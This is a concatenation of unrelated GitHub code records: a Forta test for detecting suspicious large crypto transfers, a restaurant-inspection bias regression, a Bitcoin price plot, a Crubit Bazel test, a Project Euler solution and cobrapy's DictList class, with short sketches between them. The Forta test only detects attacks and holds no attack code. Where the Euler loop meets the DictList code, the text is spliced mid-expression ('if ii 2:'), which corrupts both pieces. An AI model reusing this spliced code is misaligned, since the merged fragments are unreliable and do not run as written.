+{"seq_id":"36726239805","text":"import timeit\nimport agent\nfrom web3 import Web3\nfrom web3_mock import Web3Mock, ADDRESS_WITH_LARGE_BALANCE, ADDRESS_WITHOUT_LARGE_BALANCE, CURRENT_BLOCK, OLDER_CURRENT_BLOCK\nfrom forta_agent import create_transaction_event, FindingSeverity, get_json_rpc_url, EntityType\nfrom src.constants import SWAP_TOPICS\n\nw3 = Web3Mock()\nreal_w3 = Web3(Web3.HTTPProvider(get_json_rpc_url()))\n\n\nclass TestLargeTransferOut:\n\n    def test_large_transfer_no_alert(self):\n        agent.initialize()\n\n        tx_event = create_transaction_event({\n            'transaction': {\n                'hash': \"0\",\n                'to': \"0x1c5dCdd006EA78a7E4783f9e6021C32935a10fb4\",\n                'from': ADDRESS_WITH_LARGE_BALANCE,\n                'value': \"50000000000000000000\"\n            },\n            'block': {\n                'number': CURRENT_BLOCK\n            },\n            'receipt': {\n                'logs': []}\n        })\n\n        findings = agent.detect_suspicious_native_transfers(w3, tx_event)\n        assert len(\n            findings) == 0, \"this should not have triggered a finding as the account had assets 1 day ago\"\n\n    def test_performance(self):\n        agent.initialize()\n\n        global real_w3\n        tx = real_w3.eth.get_transaction(\n            '0x39ed9312dabfe228ab03659192540da18b97f89eb7b89abaa9a6da03011e9668')\n\n        global large_transfer_tx_event\n        large_transfer_tx_event = create_transaction_event({\n            'transaction': {\n                'hash': tx.hash,\n                'to': tx.to,\n                'from': tx['from'],\n                'value': tx.value\n            },\n            'block': {\n                'number': tx.blockNumber\n            },\n            'receipt': {\n                'logs': []}\n        })\n\n        tx = real_w3.eth.get_transaction(\n            '0xc8a4877b4b3ed9e1cbd22bcbd8d6f6e78b8d70e96475dfa4a4b9751bf0c08a29')\n        global small_transfer_tx_event\n        small_transfer_tx_event = create_transaction_event({\n            'transaction': {\n                'hash': tx.hash,\n                'to': tx.to,\n                'from': tx['from'],\n                'value': tx.value\n            },\n            'block': {\n                'number': tx.blockNumber\n            },\n            'receipt': {\n                'logs': []}\n        })\n\n        # Chain: Blocktime, Number of Tx -> Avg processing time in ms target\n        # Ethereum: 12s, 150 -> 80ms\n        # BSC: 3s, 70 -> 43ms\n        # Polygon: 2s, 50 -> 40ms\n        # Avalanche: 2s, 5 -> 400ms\n        # Arbitrum: 1s, 5 -> 200ms\n        # Optimism: 24s, 150 -> 160ms\n        # Fantom: 1s, 5 -> 200ms\n\n        # we're assuming 10% of tx will contain a large transfer\n        # so our target for polygon is 5 tx with a large transfer and 45 without large transfers\n\n        processing_runs = 10\n        processing_time_large_transfers_avg_ms = timeit.timeit(\n            'agent.detect_suspicious_native_transfers(real_w3, large_transfer_tx_event)', number=processing_runs, globals=globals()) * 1000 / processing_runs\n\n        processing_time_small_transfers_ms = timeit.timeit(\n            'agent.detect_suspicious_native_transfers(real_w3, small_transfer_tx_event)', number=processing_runs, globals=globals()) * 1000 / processing_runs\n        assert (processing_time_large_transfers_avg_ms * 0.05 + processing_time_small_transfers_ms * 0.95) / \\\n            2 < 40, \"processing time should be less than 40ms. If not, this bot is unlikely to keep up with fast chains, like Polygon\"\n\n    def test_gera_coin_attacker(self):\n        agent.initialize()\n\n        tx = real_w3.eth.get_transaction(\n            '0x39ed9312dabfe228ab03659192540da18b97f89eb7b89abaa9a6da03011e9668')\n\n        tx_event = create_transaction_event({\n            'transaction': {\n                'hash': tx.hash,\n                'to': tx.to,\n                'from': tx['from'],\n                'value': tx.value\n            },\n            'block': {\n                'number': tx.blockNumber\n            },\n            'receipt': {\n                'logs': []}\n        })\n\n        findings = agent.detect_suspicious_native_transfers(real_w3, tx_event)\n        assert len(\n            findings) == 1, \"the gera coin attacker tx should have been detected\"\n\n    def test_large_transfer_alert(self, mocker):\n        agent.initialize()\n        tx_event = create_transaction_event({\n            'transaction': {\n                'hash': \"0\",\n                'to': \"0x1c5dCdd006EA78a7E4783f9e6021C32935a10fb4\",\n                'from': ADDRESS_WITHOUT_LARGE_BALANCE,\n                'value': \"50000000000000000000\"\n            },\n            'block': {\n                'number': CURRENT_BLOCK\n            },\n            'receipt': {\n                'logs': []}\n        })\n\n        findings = agent.detect_suspicious_native_transfers(w3, tx_event)\n        assert len(\n            findings) == 1, \"this should have triggered a finding as account obtained assets within the last day\"\n\n        assert findings[0].labels[0].toDict(\n        )[\"entity\"] == ADDRESS_WITHOUT_LARGE_BALANCE, \"should have EOA address as label\"\n        assert findings[0].labels[0].toDict(\n        )[\"entity_type\"] == EntityType.Address, \"should have label_type address\"\n        assert findings[0].labels[0].toDict(\n        )[\"label\"] == 'attacker', \"should have attacker as label\"\n        assert findings[0].labels[0].toDict(\n        )[\"confidence\"] == 0.3, \"should have 0.3 as label confidence\"\n\n    def test_swaps(self, mocker):\n        agent.initialize()\n        tx_event = create_transaction_event({\n            'transaction': {\n                'hash': \"0\",\n                'to': \"0x1c5dCdd006EA78a7E4783f9e6021C32935a10fb4\",\n                'from': ADDRESS_WITHOUT_LARGE_BALANCE,\n                'value': \"50000000000000000000\"\n            },\n            'block': {\n                'number': CURRENT_BLOCK\n            },\n            'logs': [\n                {\n                    'topics': [SWAP_TOPICS[0]],\n                }\n            ],\n            'receipt': {\n                'logs': []}\n        })\n\n        findings = agent.detect_suspicious_native_transfers(w3, tx_event)\n        assert len(\n            findings) == 0, \"this should not have triggered a finding as transaction is a swap\"\n","repo_name":"forta-network/starter-kits","sub_path":"large-transfer-out-py/src/agent_test.py","file_name":"agent_test.py","file_ext":"py","file_size_in_byte":6238,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"31"}
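The performance test above drives timeit.timeit with globals=globals() so the timed statement can see module-level fixtures. A self-contained sketch of the same measurement pattern; the handler function and the 40ms budget are placeholders, not part of the bot:

import timeit

def handler(event):
    # stand-in for the real transaction handler under test
    return sum(i * i for i in range(event))

event = 10_000
runs = 10
avg_ms = timeit.timeit('handler(event)', number=runs, globals=globals()) * 1000 / runs
assert avg_ms < 40, f"average latency {avg_ms:.2f}ms exceeds the 40ms budget"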
+{"seq_id":"13058974202","text":"from __future__ import division\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport os\nfrom sklearn.model_selection import KFold, ShuffleSplit\nimport re, ast\nimport platform\nimport sklearn.ensemble\nimport sklearn.linear_model\nimport matplotlib.pyplot as plt\n\n# Python 3 replacement for the original execfile() calls\nexec(open('../../functions/python_libraries.py').read())\nexec(open('../../functions/simulation_functions.py').read())\n\n\n## This dataframe is instances_mergerd_seattle.csv from Kang et al. 2013 with additional\n## features created in KC.R.\ndta = pd.read_csv('../../../data/KangData_with_additional_features.csv')\n\n## set -1 scores to 0 (use .loc to avoid chained-assignment pitfalls)\ndta.loc[dta.inspection_penalty_score == -1, 'inspection_penalty_score'] = 0\ndta.loc[dta.inspection_average_prev_penalty_scores == -1, 'inspection_average_prev_penalty_scores'] = 0\ndta.loc[dta.inspection_prev_penalty_score == -1, 'inspection_prev_penalty_score'] = 0\n\n\nfeatures = ['inspection_average_prev_penalty_scores', 'inspection_prev_penalty_score', # SAP\n            'inspection_penalty_score', # y\n            'asian', # SUP\n            'poison', 'vomit','diarrhea', 'sick2', # CP\n            'review_count', 'average_review_rating', 'non_positive_review_count'] # CP\n\n\nny_df_subset = dta[features]\n\n\n## Rename Columns\nny_df_subset.columns = ['inspection_average_prev_penalty_scores_SAP', 'inspection_prev_penalty_score_SAP',\n                        'y',\n                        'asian_SUP',\n                        'poison_CP', 'vomit_CP','diarrhea_CP', 'sick_CP',\n                        'review_count_SAP', 'average_review_rating_SAP', 'non_positive_review_count_SAP']\n\n\n## Get SAP and CP columns\nSAP_cols = [s for s in np.array(ny_df_subset.columns) if \"SAP\" in s]\nCP_cols = [s for s in np.array(ny_df_subset.columns) if \"CP\" in s]\n\n\n# sklearn.cross_validation was removed; ShuffleSplit now lives in sklearn.model_selection\nk_fold = ShuffleSplit(n_splits=50, test_size=0.2).split(ny_df_subset)\n\n## RF Results\nfull_model = []\nfull_rmse = []\nfull_train_rmse = []\nfull_model_without_CP = []\nfull_rmse_without_CP = []\nfull_train_rmse_without_CP = []\n\n\n## OLS Results\nfull_rmse_OLS = []\nfull_train_rmse_OLS = []\nfull_rmse_OLS_without_CP = []\nfull_train_rmse_OLS_without_CP = []\n\n\nfor k, (train, test) in enumerate(k_fold):\n    print('iteration #', k)\n    df_subset_train = ny_df_subset.iloc[train,:]\n    df_subset_test = ny_df_subset.iloc[test,:]\n\n\n    ## Hyperparameter search set-up for RF\n    clf = sklearn.ensemble.RandomForestRegressor()\n    max_depth = [3, 5, 10]\n    max_depth.append(None)\n    min_samples_leaf = [5, 10, 20, 50, 100]\n    min_samples_split = [2, 3, 4, 5, 10]\n    n_estimators = [50, 100, 150]\n    max_features = ['auto', 0.25, 0.5, 0.75]\n    random_grid = {'max_depth': max_depth,\n                   'min_samples_leaf': min_samples_leaf,\n                   'max_features': max_features,\n                   'n_estimators': n_estimators,\n                   'min_samples_split': min_samples_split}\n\n    model = GridSearchCV(estimator = clf,\n                         param_grid = random_grid,\n                         cv = 3, verbose=0,\n                         n_jobs = -1)\n\n\n    ## Full\n    model.fit(df_subset_train[sum([SAP_cols, CP_cols, ['asian_SUP']], [])],\n              df_subset_train.y)\n    y_predict_full = model.predict(df_subset_test[sum([SAP_cols, CP_cols, ['asian_SUP']], [])])\n    full_rmse.append(sqrt(mean_squared_error(df_subset_test.y, y_predict_full)))\n\n    y_predict_train = model.predict(df_subset_train[sum([SAP_cols, CP_cols, ['asian_SUP']], [])])\n    full_train_rmse.append(sqrt(mean_squared_error(df_subset_train.y, y_predict_train)))\n    full_model.append(np.array(model.best_params_))\n\n\n    ## Full -- without CP\n    model.fit(df_subset_train[sum([SAP_cols, ['asian_SUP']], [])],\n              df_subset_train.y)\n    y_predict_full = model.predict(df_subset_test[sum([SAP_cols, ['asian_SUP']], [])])\n    full_rmse_without_CP.append(sqrt(mean_squared_error(df_subset_test.y, y_predict_full)))\n\n    y_predict_train = model.predict(df_subset_train[sum([SAP_cols, ['asian_SUP']], [])])\n    full_train_rmse_without_CP.append(sqrt(mean_squared_error(df_subset_train.y, y_predict_train)))\n    full_model.append(np.array(model.best_params_))\n\n\n    ##\n    ## OLS Portion\n    ##\n    model = sklearn.linear_model.LinearRegression()\n\n    ## Full\n    model.fit(df_subset_train[sum([SAP_cols, CP_cols, ['asian_SUP']], [])],\n              df_subset_train.y)\n    y_predict_full = model.predict(df_subset_test[sum([SAP_cols, CP_cols, ['asian_SUP']], [])])\n    full_rmse_OLS.append(sqrt(mean_squared_error(df_subset_test.y, y_predict_full)))\n\n    y_predict_train = model.predict(df_subset_train[sum([SAP_cols, CP_cols, ['asian_SUP']], [])])\n    full_train_rmse_OLS.append(sqrt(mean_squared_error(df_subset_train.y, y_predict_train)))\n\n\n    ## Full -- without CP\n    model.fit(df_subset_train[sum([SAP_cols, ['asian_SUP']], [])],\n              df_subset_train.y)\n    y_predict_full = model.predict(df_subset_test[sum([SAP_cols, ['asian_SUP']], [])])\n    full_rmse_OLS_without_CP.append(sqrt(mean_squared_error(df_subset_test.y, y_predict_full)))\n\n    y_predict_train = model.predict(df_subset_train[sum([SAP_cols, ['asian_SUP']], [])])\n    full_train_rmse_OLS_without_CP.append(sqrt(mean_squared_error(df_subset_train.y, y_predict_train)))\n\n\nresults = pd.DataFrame({'Full_RF_RMSE_test': full_rmse,\n                        'Full_RF_RMSE_train': full_train_rmse,\n                        'Full_OLS_RMSE_test': full_rmse_OLS,\n                        'Full_OLS_RMSE_train': full_train_rmse_OLS,\n                        'Full_RF_RMSE_test_without_CP': full_rmse_without_CP,\n                        'Full_RF_RMSE_train_without_CP': full_train_rmse_without_CP,\n                        'Full_OLS_RMSE_test_without_CP': full_rmse_OLS_without_CP,\n                        'Full_OLS_RMSE_train_without_CP': full_train_rmse_OLS_without_CP})\n\nresults.to_csv('./output/Kang_output_record_model_with_and_without_keywords.csv')\n\n","repo_name":"kaltenburger/Bias","sub_path":"code/b_PopeSydnor/2_KC_NY_analysis/b1_PopeSydnor_applied_KC_RMSE_with_without_keywords.py","file_name":"b1_PopeSydnor_applied_KC_RMSE_with_without_keywords.py","file_ext":"py","file_size_in_byte":5889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
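The evaluation loop above nests a GridSearchCV-tuned RandomForestRegressor inside a ShuffleSplit resampling loop. A compact sketch of that pattern on synthetic data; the grid, sizes, and seed are illustrative, not the study's settings:

import numpy as np
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import GridSearchCV, ShuffleSplit

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 4))
y = X @ np.array([1.0, -2.0, 0.5, 0.0]) + rng.normal(scale=0.1, size=200)

splitter = ShuffleSplit(n_splits=5, test_size=0.2, random_state=0)
grid = {"max_depth": [3, None], "n_estimators": [50, 100]}

for train, test in splitter.split(X):
    # inner 3-fold grid search on the training split only
    model = GridSearchCV(RandomForestRegressor(random_state=0), grid, cv=3)
    model.fit(X[train], y[train])
    rmse = np.sqrt(mean_squared_error(y[test], model.predict(X[test])))
    print(f"test RMSE: {rmse:.3f}")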
+{"seq_id":"34255219253","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nfrom matplotlib import dates as mpl_dates\n\nplt.style.use('ggplot')\n\ndata = pd.read_csv(\n    'c:/Users/JINIT JAIN/OneDrive/Documents/GitHub/Vision-AI-Taskphase/Task-2/MATPLOTLIB/08/data8.csv')\n\ndata['Date'] = pd.to_datetime(data['Date'])\n# sort the rows by date in place instead of returning a sorted copy\ndata.sort_values('Date', inplace=True)\n\nprice_date = data['Date']\nprice_close = data['Close']\n\n# plt.plot_date is deprecated; a plain plot handles datetime x-values\nplt.plot(price_date, price_close, linestyle='solid')\n\nplt.gcf().autofmt_xdate()\n\nplt.title('Bitcoin Prices On Various Dates')\nplt.xlabel('Dates')\nplt.ylabel('Closing Prices')\n\nplt.tight_layout()\nplt.savefig('Bitcoin')\nplt.show()\n","repo_name":"jinit99/Vision-AI-Taskphase","sub_path":"Task-2/MATPLOTLIB/08/code8.py","file_name":"code8.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
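The plotting script above imports matplotlib.dates but never calls it; its typical role is explicit tick formatting on a date axis. A minimal sketch with synthetic dates (the data and format string are illustrative):

from datetime import date, timedelta
from matplotlib import pyplot as plt
from matplotlib import dates as mpl_dates

days = [date(2021, 1, 1) + timedelta(days=i) for i in range(30)]
values = [i ** 0.5 for i in range(30)]

plt.plot(days, values, linestyle='solid')
plt.gca().xaxis.set_major_formatter(mpl_dates.DateFormatter('%b %d, %Y'))
plt.gcf().autofmt_xdate()  # rotate tick labels so they do not overlap
plt.show()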
+{"seq_id":"74317490329","text":"# Part of the Crubit project, under the Apache License v2.0 with LLVM\n# Exceptions. See /LICENSE for license information.\n# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception\n\n\"\"\"This module contains unit tests for pipelined compilation of bindings.\"\"\"\n\nload(\"@bazel_skylib//lib:unittest.bzl\", \"analysistest\", \"asserts\")\nload(\n    \"//common:crubit_wrapper_macros_oss.bzl\",\n    \"crubit_make_analysis_test\",\n)\nload(\n    \"//rs_bindings_from_cc/test/bazel_unit_tests:defs.bzl\",\n    \"ActionsInfo\",\n    \"attach_aspect\",\n)\n\ndef _contains_input_of_type(name, input_type, inputs):\n    return len([\n        i\n        for i in inputs\n        if i.extension == input_type and i.basename.startswith(\"lib\" + name)\n    ]) > 0\n\ndef _action_inputs_with_pipelining_analysis_test_impl(ctx):\n    env = analysistest.begin(ctx)\n    target_under_test = analysistest.target_under_test(env)\n\n    metadata_action = [\n        a\n        for a in target_under_test[ActionsInfo].actions\n        if a.mnemonic == \"RustcMetadata\"\n    ][0]\n\n    # Check that we generate metadata for our binding\n    asserts.true(env, metadata_action != None)\n\n    metadata_action_inputs = metadata_action.inputs.to_list()\n\n    # Check that our metadata action accepts metadata inputs from the dependencies\n    asserts.true(env, _contains_input_of_type(\"middle\", \"rmeta\", metadata_action_inputs))\n    asserts.true(env, _contains_input_of_type(\"top\", \"rmeta\", metadata_action_inputs))\n    asserts.false(env, _contains_input_of_type(\"middle\", \"rlib\", metadata_action_inputs))\n    asserts.false(env, _contains_input_of_type(\"top\", \"rlib\", metadata_action_inputs))\n\n    rlib_action = [a for a in target_under_test[ActionsInfo].actions if a.mnemonic == \"Rustc\"][0]\n    rlib_action_inputs = rlib_action.inputs.to_list()\n\n    # Check that the rlib action accepts metadata inputs from the dependencies\n    asserts.true(env, _contains_input_of_type(\"middle\", \"rmeta\", rlib_action_inputs))\n    asserts.true(env, _contains_input_of_type(\"top\", \"rmeta\", rlib_action_inputs))\n    asserts.false(env, _contains_input_of_type(\"middle\", \"rlib\", rlib_action_inputs))\n    asserts.false(env, _contains_input_of_type(\"top\", \"rlib\", rlib_action_inputs))\n\n    return analysistest.end(env)\n\naction_inputs_with_pipelining_analysis_test = crubit_make_analysis_test(\n    _action_inputs_with_pipelining_analysis_test_impl,\n)\n\ndef _targets_for_pipelined_compilation():\n    native.cc_library(\n        name = \"top\",\n        hdrs = [\n            \"top.h\",\n        ],\n    )\n    native.cc_library(\n        name = \"middle\",\n        hdrs = [\n            \"middle.h\",\n        ],\n        deps = [\":top\"],\n    )\n    native.cc_library(\n        name = \"bottom\",\n        hdrs = [\"bottom.h\"],\n        deps = [\":middle\"],\n    )\n\n    attach_aspect(name = \"pipelined_compilation_of_bindings\", dep = \":bottom\")\n\n    action_inputs_with_pipelining_analysis_test(\n        name = \"pipelined_compilation_of_bindings_test\",\n        target_under_test = \":pipelined_compilation_of_bindings\",\n    )\n\ndef pipelined_compilation_test(name):\n    \"\"\"Sets up rust_bindings_from_cc_aspect test suite.\n\n    Args:\n        name: name of the test suite\"\"\"\n    _targets_for_pipelined_compilation()\n\n    native.test_suite(\n        name = name,\n        tests = [\n            \":pipelined_compilation_of_bindings_test\",\n        ],\n    )\n","repo_name":"google/crubit","sub_path":"rs_bindings_from_cc/test/bazel_unit_tests/pipelined_compilation/pipelined_compilation_test.bzl","file_name":"pipelined_compilation_test.bzl","file_ext":"bzl","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":420,"dataset":"github-code","pt":"31"}
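The Project Euler 49 solution just below scans permutations of every four-digit number, which is expensive; grouping the four-digit primes by their sorted digit signature first makes the search nearly free. A hedged sketch of that alternative (not from the repository):

from collections import defaultdict
from sympy import isprime

# bucket four-digit primes by the multiset of their digits
groups = defaultdict(list)
for n in range(1000, 10000):
    if isprime(n):
        groups[''.join(sorted(str(n)))].append(n)

for primes in groups.values():
    prime_set = set(primes)
    for p in primes:
        # look for a 3330-spaced triple inside one permutation class,
        # skipping the 1487 example given in the problem statement
        if p != 1487 and p + 3330 in prime_set and p + 6660 in prime_set:
            print(f"{p}{p + 3330}{p + 6660}")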
+{"seq_id":"7659799886","text":"\"\"\"\nThe terms 1487, 4817, 8147 form an arithmetic sequence that increases by 3330. This sequence is unusual in two ways:\n● All three numbers are prime.\n● Each of the three numbers is a permutation of the digits of the others.\nNo sequence with these properties exists among 1-, 2-, or 3-digit primes, but among 4-digit primes there is one other such sequence besides the one above.\nWhat is the 12-digit number formed by concatenating the three terms of that sequence?\n\"\"\"\n\nimport numpy as np\nfrom sympy import isprime\nfrom itertools import permutations\n\nfor n in range(1000,10000):\n    per = np.array([])\n    for i,j,k,l in permutations(str(n)):\n        if isprime(int(i+j+k+l)) and i!=\"0\":\n            per = np.append(per, int(i+j+k+l))\n\n    for ii in per:\n        for jj in per:\n            for kk in per:\n                if ii 2:\n            raise TypeError(f\"takes at most 1 argument ({len(args):d} given)\")\n        super(DictList, self).__init__(self)\n        self._dict = {}\n        if len(args) == 1:\n            other = args[0]\n            if isinstance(other, DictList):\n                list.extend(self, other)\n                self._dict = other._dict.copy()\n            else:\n                self.extend(other)\n\n    # noinspection PyShadowingBuiltins\n    def has_id(self, id: Union[Object, str]) -> bool:\n        \"\"\"Check if id is in DictList.\"\"\"\n        return id in self._dict\n\n    # noinspection PyShadowingBuiltins\n    def _check(self, id: Union[Object, str]) -> None:\n        \"\"\"Make sure duplicate id's are not added.\n\n        This function is called before adding in elements.\n\n        \"\"\"\n        if id in self._dict:\n            raise ValueError(f\"id {str(id)} is already present in list\")\n\n    def _generate_index(self) -> None:\n        \"\"\"Rebuild the _dict index.\"\"\"\n        self._dict = {v.id: k for k, v in enumerate(self)}\n\n    # noinspection PyShadowingBuiltins\n    def get_by_id(self, id: Union[Object, str]) -> Object:\n        \"\"\"Return the element with a matching id.\"\"\"\n        return list.__getitem__(self, self._dict[id])\n\n    def list_attr(self, attribute: str) -> list:\n        \"\"\"Return a list of the given attribute for every object.\"\"\"\n        return [getattr(i, attribute) for i in self]\n\n    def get_by_any(self, iterable: List[Union[str, Object, int]]) -> list:\n        \"\"\"Get a list of members using several different ways of indexing.\n\n        Parameters\n        ----------\n        iterable : list (if not, turned into single element list)\n            list where each element is either int (referring to an index\n            in this DictList), string (an id of a member in this DictList) or\n            member of this DictList for pass-through\n\n        Returns\n        -------\n        list\n            a list of members\n        \"\"\"\n\n        def get_item(item: Any) -> Any:\n            if isinstance(item, int):\n                return self[item]\n            elif isinstance(item, str):\n                return self.get_by_id(item)\n            elif item in self:\n                return item\n            else:\n                raise TypeError(f\"item in iterable cannot be '{type(item)}'\")\n\n        if not isinstance(iterable, list):\n            iterable = [iterable]\n        return [get_item(item) for item in iterable]\n\n    def query(\n        self,\n        search_function: Union[str, Pattern, Callable],\n        attribute: Union[str, None] = None,\n    ) -> \"DictList\":\n        \"\"\"Query the list.\n\n        Parameters\n        ----------\n        search_function : a string, regular expression or function\n            Used to find the matching elements in the list.\n            - a regular expression (possibly compiled), in which case the\n            given attribute of the object should match the regular expression.\n            - a function which takes one argument and returns True for\n            desired values\n\n        attribute : string or None\n            the name attribute of the object to be passed as argument to the\n            `search_function`. 
If this is None, the object itself is used.\n\n Returns\n -------\n DictList\n a new list of objects which match the query\n\n Examples\n --------\n >>> from cobra.io import load_model\n >>> model = load_model('textbook')\n >>> model.reactions.query(lambda x: x.boundary)\n >>> import re\n >>> regex = re.compile('^g', flags=re.IGNORECASE)\n >>> model.metabolites.query(regex, attribute='name')\n \"\"\"\n\n def select_attribute(x: Optional[Any]) -> Any:\n if attribute is None:\n return x\n else:\n return getattr(x, attribute)\n\n try:\n # if the search_function is a regular expression\n regex_searcher = re.compile(search_function)\n\n if attribute is not None:\n matches = (\n i for i in self if regex_searcher.findall(select_attribute(i)) != []\n )\n\n else:\n # Don't regex on objects\n matches = (i for i in self if regex_searcher.findall(i.id) != [])\n\n except TypeError:\n matches = (i for i in self if search_function(select_attribute(i)))\n\n results = self.__class__()\n results._extend_nocheck(matches)\n return results\n\n def _replace_on_id(self, new_object: Object) -> None:\n \"\"\"Replace an object by another with the same id.\"\"\"\n the_id = new_object.id\n the_index = self._dict[the_id]\n list.__setitem__(self, the_index, new_object)\n\n # overriding default list functions with new ones\n def append(self, entity: Object) -> None:\n \"\"\"Append object to end.\"\"\"\n the_id = entity.id\n self._check(the_id)\n self._dict[the_id] = len(self)\n list.append(self, entity)\n\n def union(self, iterable: Iterable[Object]) -> None:\n \"\"\"Add elements with id's not already in the model.\"\"\"\n _dict = self._dict\n append = self.append\n for i in iterable:\n if i.id not in _dict:\n append(i)\n\n def extend(self, iterable: Iterable[Object]) -> None:\n \"\"\"Extend list by appending elements from the iterable.\n\n Sometimes during initialization from an older pickle, _dict\n will not have initialized yet, because the initialization class was\n left unspecified. This is an issue because unpickling calls\n DictList.extend, which requires the presence of _dict. Therefore,\n the issue is caught and addressed here.\n\n Parameters\n ----------\n iterable : Iterable\n \"\"\"\n if getattr(self, \"_dict\", None) is None:\n self._dict = {}\n _dict = self._dict\n current_length = len(self)\n list.extend(self, iterable)\n for i, obj in enumerate(islice(self, current_length, None), current_length):\n the_id = obj.id\n if the_id not in _dict:\n _dict[the_id] = i\n else:\n # undo the extend and raise an error\n self = self[:current_length]\n self._check(the_id)\n # if the above succeeded, then the id must be present\n # twice in the list being added\n raise ValueError(\n f\"id '{str(the_id)}' at index {i :d} is non-unique. \"\n f\"Is it present twice?\"\n )\n\n def _extend_nocheck(self, iterable: Iterable[Object]) -> None:\n \"\"\"Extend without checking for uniqueness.\n\n This function should only be used internally by DictList when it\n can guarantee elements are already unique (as in when coming from\n self or other DictList). 
It will be faster because it skips these\n        checks.\n\n        Parameters\n        ----------\n        iterable : Iterable\n\n        \"\"\"\n        current_length = len(self)\n        list.extend(self, iterable)\n        _dict = self._dict\n        if not current_length:\n            self._generate_index()\n            return\n        for i, obj in enumerate(islice(self, current_length, None), current_length):\n            _dict[obj.id] = i\n\n    def __sub__(self, other: Iterable[Object]) -> \"DictList\":\n        \"\"\"Remove a value or values, and return the new DictList.\n\n        x.__sub__(y) <==> x - y\n\n        Parameters\n        ----------\n        other : iterable\n            other must contain only unique id's present in the list\n\n        Returns\n        -------\n        total: DictList\n            new DictList with item(s) removed\n        \"\"\"\n        total = DictList()\n        total.extend(self)\n        for item in other:\n            total.remove(item)\n        return total\n\n    def __isub__(self, other: Iterable[Object]) -> \"DictList\":\n        \"\"\"Remove a value or values in place.\n\n        x.__isub__(y) <==> x -= y\n\n        Parameters\n        ----------\n        other : iterable\n            other must contain only unique id's present in the list\n        \"\"\"\n        for item in other:\n            self.remove(item)\n        return self\n\n    def __add__(self, other: Iterable[Object]) -> \"DictList\":\n        \"\"\"Add item while returning a new DictList.\n\n        x.__add__(y) <==> x + y\n\n        Parameters\n        ----------\n        other : iterable\n            other must contain only unique id's which do not intersect\n            with self\n        \"\"\"\n        total = DictList()\n        total.extend(self)\n        total.extend(other)\n        return total\n\n    def __iadd__(self, other: Iterable[Object]) -> \"DictList\":\n        \"\"\"Add item while returning the same DictList.\n\n        x.__iadd__(y) <==> x += y\n\n        Parameters\n        ----------\n        other : iterable\n            other must contain only unique id's which do not intersect\n            with self\n\n        \"\"\"\n        self.extend(other)\n        return self\n\n    def __reduce__(self) -> Tuple[Type[\"DictList\"], Tuple, dict, Iterator]:\n        \"\"\"Return a reduced version of DictList.\n\n        This reduced version details the class, an empty Tuple, a dictionary of the\n        state and an iterator to go over the DictList.\n        \"\"\"\n        return self.__class__, (), self.__getstate__(), self.__iter__()\n\n    def __getstate__(self) -> dict:\n        \"\"\"Get internal state.\n\n        This is only provided for backwards compatibility so older\n        versions of cobrapy can load pickles generated with cobrapy. In\n        reality, the \"_dict\" state is ignored when loading a pickle\n        \"\"\"\n        return {\"_dict\": self._dict}\n\n    def __setstate__(self, state: dict) -> None:\n        \"\"\"Pretend to set internal state. Actually recalculates.\n\n        Ignore the passed in state and recalculate it. 
This is only for\n compatibility with older pickles which did not correctly specify\n the initialization class\n \"\"\"\n self._generate_index()\n\n # noinspection PyShadowingBuiltins\n def index(self, id: Union[str, Object], *args) -> int:\n \"\"\"Determine the position in the list.\n\n Parameters\n ----------\n id: A string or a :class:`~cobra.core.Object.Object`\n\n \"\"\"\n # because values are unique, start and stop are not relevant\n if isinstance(id, str):\n try:\n return self._dict[id]\n except KeyError:\n raise ValueError(f\"{id} not found\")\n try:\n i = self._dict[id.id]\n if self[i] is not id:\n raise ValueError(\n f\"Another object with the identical id ({id.id}) found\"\n )\n return i\n except KeyError:\n raise ValueError(f\"{str(id)} not found\")\n\n def __contains__(self, entity: Union[str, Object]) -> bool:\n \"\"\"Ask if the DictList contain an entity.\n\n DictList.__contains__(entity) <==> entity in DictList\n\n Parameters\n ----------\n entity: str or :class:`~cobra.core.Object.Object`\n\n \"\"\"\n if hasattr(entity, \"id\"):\n the_id = entity.id\n # allow to check with the object itself in addition to the id\n else:\n the_id = entity\n return the_id in self._dict\n\n def __copy__(self) -> \"DictList\":\n \"\"\"Copy the DictList into a new one.\"\"\"\n the_copy = DictList()\n list.extend(the_copy, self)\n the_copy._dict = self._dict.copy()\n return the_copy\n\n def insert(self, index: int, entity: Object) -> None:\n \"\"\"Insert entity before index.\"\"\"\n self._check(entity.id)\n list.insert(self, index, entity)\n # all subsequent entries now have been shifted up by 1\n _dict = self._dict\n for i, j in _dict.items():\n if j >= index:\n _dict[i] = j + 1\n _dict[entity.id] = index\n\n def pop(self, *args) -> Object:\n \"\"\"Remove and return item at index (default last).\"\"\"\n value = list.pop(self, *args)\n index = self._dict.pop(value.id)\n # If the pop occurred from a location other than the end of the list,\n # we will need to subtract 1 from every entry afterwards\n if len(args) == 0 or args == [-1]: # removing from the end of the list\n return value\n _dict = self._dict\n for i, j in _dict.items():\n if j > index:\n _dict[i] = j - 1\n return value\n\n def add(self, x: Object) -> None:\n \"\"\"Opposite of `remove`. Mirrors set.add.\"\"\"\n self.extend([x])\n\n def remove(self, x: Union[str, Object]) -> None:\n \"\"\".. 
